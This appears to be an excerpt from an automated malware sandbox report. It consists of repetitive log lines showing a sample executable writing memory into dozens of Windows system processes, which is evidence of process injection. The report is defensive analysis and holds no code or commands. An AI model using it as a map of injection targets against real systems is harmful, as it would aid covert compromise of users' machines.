            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 160000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: C80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: DF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AC0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 6F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 400000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 8880000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 910000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 170000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: C90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AD0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 700000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 410000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 8850000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 920000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 180000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CA0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 710000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 420000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 2F60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 930000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 190000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 300000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 720000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 430000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 8830000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 940000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CC0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 310000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 600000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: B00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 730000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 440000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 8860000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 950000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: 100000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CD0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 320000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 610000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: B10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 740000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 450000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 8870000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 960000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: 110000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 330000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 620000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: B20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 750000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 460000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: B60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 89A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 970000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F80000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: 120000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: CF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 340000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 630000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: E60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: B30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 760000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 470000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 350000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 640000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 770000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: BA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 480000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: CA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 990000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: E0000Jump to behavior
